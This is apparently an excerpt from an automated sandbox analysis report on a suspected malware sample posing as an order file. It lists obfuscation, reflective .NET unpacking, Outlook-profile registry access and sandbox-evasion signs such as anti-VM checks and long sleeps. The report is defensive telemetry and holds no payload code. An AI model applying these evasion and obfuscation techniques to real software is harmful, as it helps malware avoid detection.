Source: C:\Users\user\Desktop\new order 00041221.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: new order 00041221.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: new order 00041221.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 1.2.new order 00041221.exe.4e00000.5.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 1.2.new order 00041221.exe.4e00000.5.raw.unpack, PingPong.cs .Net Code: Justy
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs .Net Code: zn4PwiPIJE System.Reflection.Assembly.Load(byte[])
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs .Net Code: zn4PwiPIJE System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_00B50995 push es; retf 1_2_00B50996
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_00B50990 push es; retf 1_2_00B50992
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_00B50998 push es; retf 1_2_00B5099A
Source: new order 00041221.exe Static PE information: section name: .text entropy: 7.869956261157549
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WEkErVgJn1PjkdRbDK.cs High entropy of concatenated method names: 'ksnI2GS1Sg', 'VnxIHA1l58', 't0a4VAcCPY', 'oQ84QADq3w', 'eI3I7WmpKy', 'EJuIi4Zvbw', 'fmqIJplq0r', 'h5TIThviGG', 'UvbIp8eT3v', 'EsqIKrXUbo'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WWoXcRNneectu4WPwU.cs High entropy of concatenated method names: 'RKxXTaU8XU', 'O4fXpM9MLJ', 'JZQXK2uKPD', 'mq2XA3gDqd', 'kmHXM5uq7j', 'pN6XgcqyJ0', 'XptXBdQ7MW', 'Tf1X21wsy0', 'CygX3yV0An', 'aH8XHyXNT5'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs High entropy of concatenated method names: 'TnNcydYa2J', 'dDScniRR6g', 'uifcX6rF3s', 'nvTc17deCr', 'go7cFXNGOO', 'aeFcqE6AOX', 'p1GcdwLXIJ', 'q2WcLOinJS', 'M45cvlLUBX', 'vmHc6aeHeH'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, oea08sDOxeGOQEPJMl.cs High entropy of concatenated method names: 'cZi1UD1duR', 'Ts41mieuZQ', 'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9', 'F9g1btumD8', 'Q6S1Ig8Mgq', 'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, XmPheVJY4ysEIwXRAO.cs High entropy of concatenated method names: 'CgOYNhHAP8', 'uRcYDFv0kY', 'L3KYCgYnO6', 'JhPYaQEUk1', 'LSDYhTMLv0', 'rnxYtRxO1p', 'Qy7YuRNx2J', 'dHDYl1xcid', 'vO6YG442JZ', 'tDbY7BPaeV'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, mbWDZh1fAEZLVbsgfE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jw8E31Gaa6', 'nnVEHVEl9N', 'ndFEzAoAJN', 'paKcVOD7yC', 'j4acQh4pQv', 'tkRcEw5qPq', 'Nk6cc7I2M9', 'pyCWuszn5xgZTgfnr4'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, I7YwgKocvwlhG6qbjf.cs High entropy of concatenated method names: 'wdWdOkt4Ps', 'BamdjKUSML', 'eVCdwilZeg', 'mSHdUjUfqC', 'iCSdxYoDsc', 'aehdmNBA7r', 'am5dR4ucNm', 'F5tdNOlLFZ', 'W1LdDeFOWc', 'G3idWcUSLB'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, PIIQJlCPLLSpQvTcKh.cs High entropy of concatenated method names: 'b4GqyFWMdu', 'AfAqX6BqTP', 'ONFqFuTCFb', 'cCHqdTZVgh', 'eMVqLEAHQ3', 'iSpFMvLFvV', 'R9RFgeiQ7D', 'D7NFBRGC3o', 'vO1F2beHyp', 'CcWF3y8wEN'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GYgZrNuv1RLjrByTBp.cs High entropy of concatenated method names: 'iuwdnHRsSL', 'QSMd1F3EnS', 'KJddqi2bQf', 'lwKqHsatdr', 'XY8qzqC01e', 'lu0dV442ey', 'of0dQ67e9b', 'GnEdEGwfuG', 'gk2dcRFu0Z', 'pKvdPIspOA'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, hoHp1pQctWiW4gDnx50.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tsAZTNw5uf', 'uYcZpVy21l', 'n6aZKsjMAm', 'GDwZAyOhkQ', 'WoaZMv3tJE', 'gutZgOrcEU', 'BvsZBefRFc'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, EOaFyVT7LVLL2nf3aa.cs High entropy of concatenated method names: 'QKq9GO9fTr', 'gyD9i53UBx', 'p2P9TW5cah', 'gms9pywHhM', 'dLy9am6YKj', 'Wnr9sI7qFF', 'x8A9hHXUN5', 't6m9tsNGWd', 'QGQ9eMPTLG', 'rti9upkk4l'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, AqI0NT2diOTHy7sR0b.cs High entropy of concatenated method names: 'tuV4nyOFRM', 'y6F4Xp7hNv', 'bmD41et1gl', 'UIY4FicyPl', 'TGo4q7HxGK', 'bQs4dAEteO', 'Yf14LiYr7Z', 'Dxn4vQZICO', 'dLt46E79RC', 'JoG4r6bHYo'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GXXJusPBLvRYKwa80t.cs High entropy of concatenated method names: 'R32QdWoXcR', 'feeQLctu4W', 'HOxQ6eGOQE', 'eJMQrlq8D6', 'WsSQ90ZiII', 'bJlQbPLLSp', 'NnsoucCHxhjAwZMhmt', 'YGMTVDOjmS5iXELVeW', 'dmmQQah407', 'SgrQc2WkMG'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, UNqWbw3JDl6LusN8wK.cs High entropy of concatenated method names: 'Kjx4CvxSgn', 'ypk4aUWCm1', 'mlS4suMWec', 'dNl4h5XYDT', 'avw4T5rcsq', 'MqE4t5ZWy0', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, DsmWQqH9ImqBkLuxMX.cs High entropy of concatenated method names: 's9l8QCne5F', 'tjm8cvEgBE', 'DKB8PFkg0y', 'nwv8nxfSyE', 'LY88Xj82vM', 'zPt8FCqvDF', 'FIp8qBvDyt', 'bcB4BXeTTW', 'NR4421EPwJ', 'PLL434vFq2'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, bdkeCrEVO5b4aL692H.cs High entropy of concatenated method names: 'I8EwZfp6c', 'pUJU8T80o', 'AadmniBuO', 't2cR03kQc', 'oTVDWbFOM', 'ItkWLWrx1', 'X6e2a2abtuTE5Bm115', 'bcVhaRQTvD5v2RDGdp', 'U314W1CEr', 'oCHZooEr4'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, P6MW4SQV1ZS9x9j2kD1.cs High entropy of concatenated method names: 'XQK8OFv8Gd', 'vXR8jmwba6', 'SIS8wCjfnD', 'aVL8UZhaRv', 'Epq8x4uoDE', 'P0U8meJxAG', 'y288RW4Hr9', 'Ard8NsxcSb', 'HLs8DQc3WI', 'bdq8WFJSKe'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GO6JcJXsuV8AKf3A4i.cs High entropy of concatenated method names: 'Dispose', 'bcRQ3ZkbIi', 'OMxEaZsbQ7', 'cNqUUWQuGV', 'nUqQHI0NTd', 'POTQzHy7sR', 'ProcessDialogKey', 'wbMEVNqWbw', 'QDlEQ6LusN', 'rwKEENsmWQ'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, i8D6JcW7rn00w2sS0Z.cs High entropy of concatenated method names: 'Qd6Fx6BdST', 'cFgFR2Zn1M', 'BLd1s1n3JR', 'qKK1hqcd29', 'gh31tEIYRV', 'aug1eNL3oL', 'Sle1u2sA8l', 'TwD1lvAuXd', 'DYh1oHpr3v', 'lEU1GAIYf2'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WEkErVgJn1PjkdRbDK.cs High entropy of concatenated method names: 'ksnI2GS1Sg', 'VnxIHA1l58', 't0a4VAcCPY', 'oQ84QADq3w', 'eI3I7WmpKy', 'EJuIi4Zvbw', 'fmqIJplq0r', 'h5TIThviGG', 'UvbIp8eT3v', 'EsqIKrXUbo'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WWoXcRNneectu4WPwU.cs High entropy of concatenated method names: 'RKxXTaU8XU', 'O4fXpM9MLJ', 'JZQXK2uKPD', 'mq2XA3gDqd', 'kmHXM5uq7j', 'pN6XgcqyJ0', 'XptXBdQ7MW', 'Tf1X21wsy0', 'CygX3yV0An', 'aH8XHyXNT5'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs High entropy of concatenated method names: 'TnNcydYa2J', 'dDScniRR6g', 'uifcX6rF3s', 'nvTc17deCr', 'go7cFXNGOO', 'aeFcqE6AOX', 'p1GcdwLXIJ', 'q2WcLOinJS', 'M45cvlLUBX', 'vmHc6aeHeH'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, oea08sDOxeGOQEPJMl.cs High entropy of concatenated method names: 'cZi1UD1duR', 'Ts41mieuZQ', 'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9', 'F9g1btumD8', 'Q6S1Ig8Mgq', 'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, XmPheVJY4ysEIwXRAO.cs High entropy of concatenated method names: 'CgOYNhHAP8', 'uRcYDFv0kY', 'L3KYCgYnO6', 'JhPYaQEUk1', 'LSDYhTMLv0', 'rnxYtRxO1p', 'Qy7YuRNx2J', 'dHDYl1xcid', 'vO6YG442JZ', 'tDbY7BPaeV'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, mbWDZh1fAEZLVbsgfE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jw8E31Gaa6', 'nnVEHVEl9N', 'ndFEzAoAJN', 'paKcVOD7yC', 'j4acQh4pQv', 'tkRcEw5qPq', 'Nk6cc7I2M9', 'pyCWuszn5xgZTgfnr4'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, I7YwgKocvwlhG6qbjf.cs High entropy of concatenated method names: 'wdWdOkt4Ps', 'BamdjKUSML', 'eVCdwilZeg', 'mSHdUjUfqC', 'iCSdxYoDsc', 'aehdmNBA7r', 'am5dR4ucNm', 'F5tdNOlLFZ', 'W1LdDeFOWc', 'G3idWcUSLB'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, PIIQJlCPLLSpQvTcKh.cs High entropy of concatenated method names: 'b4GqyFWMdu', 'AfAqX6BqTP', 'ONFqFuTCFb', 'cCHqdTZVgh', 'eMVqLEAHQ3', 'iSpFMvLFvV', 'R9RFgeiQ7D', 'D7NFBRGC3o', 'vO1F2beHyp', 'CcWF3y8wEN'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GYgZrNuv1RLjrByTBp.cs High entropy of concatenated method names: 'iuwdnHRsSL', 'QSMd1F3EnS', 'KJddqi2bQf', 'lwKqHsatdr', 'XY8qzqC01e', 'lu0dV442ey', 'of0dQ67e9b', 'GnEdEGwfuG', 'gk2dcRFu0Z', 'pKvdPIspOA'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, hoHp1pQctWiW4gDnx50.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tsAZTNw5uf', 'uYcZpVy21l', 'n6aZKsjMAm', 'GDwZAyOhkQ', 'WoaZMv3tJE', 'gutZgOrcEU', 'BvsZBefRFc'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, EOaFyVT7LVLL2nf3aa.cs High entropy of concatenated method names: 'QKq9GO9fTr', 'gyD9i53UBx', 'p2P9TW5cah', 'gms9pywHhM', 'dLy9am6YKj', 'Wnr9sI7qFF', 'x8A9hHXUN5', 't6m9tsNGWd', 'QGQ9eMPTLG', 'rti9upkk4l'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, AqI0NT2diOTHy7sR0b.cs High entropy of concatenated method names: 'tuV4nyOFRM', 'y6F4Xp7hNv', 'bmD41et1gl', 'UIY4FicyPl', 'TGo4q7HxGK', 'bQs4dAEteO', 'Yf14LiYr7Z', 'Dxn4vQZICO', 'dLt46E79RC', 'JoG4r6bHYo'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GXXJusPBLvRYKwa80t.cs High entropy of concatenated method names: 'R32QdWoXcR', 'feeQLctu4W', 'HOxQ6eGOQE', 'eJMQrlq8D6', 'WsSQ90ZiII', 'bJlQbPLLSp', 'NnsoucCHxhjAwZMhmt', 'YGMTVDOjmS5iXELVeW', 'dmmQQah407', 'SgrQc2WkMG'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, UNqWbw3JDl6LusN8wK.cs High entropy of concatenated method names: 'Kjx4CvxSgn', 'ypk4aUWCm1', 'mlS4suMWec', 'dNl4h5XYDT', 'avw4T5rcsq', 'MqE4t5ZWy0', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, DsmWQqH9ImqBkLuxMX.cs High entropy of concatenated method names: 's9l8QCne5F', 'tjm8cvEgBE', 'DKB8PFkg0y', 'nwv8nxfSyE', 'LY88Xj82vM', 'zPt8FCqvDF', 'FIp8qBvDyt', 'bcB4BXeTTW', 'NR4421EPwJ', 'PLL434vFq2'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, bdkeCrEVO5b4aL692H.cs High entropy of concatenated method names: 'I8EwZfp6c', 'pUJU8T80o', 'AadmniBuO', 't2cR03kQc', 'oTVDWbFOM', 'ItkWLWrx1', 'X6e2a2abtuTE5Bm115', 'bcVhaRQTvD5v2RDGdp', 'U314W1CEr', 'oCHZooEr4'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, P6MW4SQV1ZS9x9j2kD1.cs High entropy of concatenated method names: 'XQK8OFv8Gd', 'vXR8jmwba6', 'SIS8wCjfnD', 'aVL8UZhaRv', 'Epq8x4uoDE', 'P0U8meJxAG', 'y288RW4Hr9', 'Ard8NsxcSb', 'HLs8DQc3WI', 'bdq8WFJSKe'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GO6JcJXsuV8AKf3A4i.cs High entropy of concatenated method names: 'Dispose', 'bcRQ3ZkbIi', 'OMxEaZsbQ7', 'cNqUUWQuGV', 'nUqQHI0NTd', 'POTQzHy7sR', 'ProcessDialogKey', 'wbMEVNqWbw', 'QDlEQ6LusN', 'rwKEENsmWQ'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, i8D6JcW7rn00w2sS0Z.cs High entropy of concatenated method names: 'Qd6Fx6BdST', 'cFgFR2Zn1M', 'BLd1s1n3JR', 'qKK1hqcd29', 'gh31tEIYRV', 'aug1eNL3oL', 'Sle1u2sA8l', 'TwD1lvAuXd', 'DYh1oHpr3v', 'lEU1GAIYf2'
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\new order 00041221.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: B50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 2850000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 2580000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 6D40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 7D40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 7FC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 8FC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 1270000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 2EE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 2DC0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598461 Jump to behavior
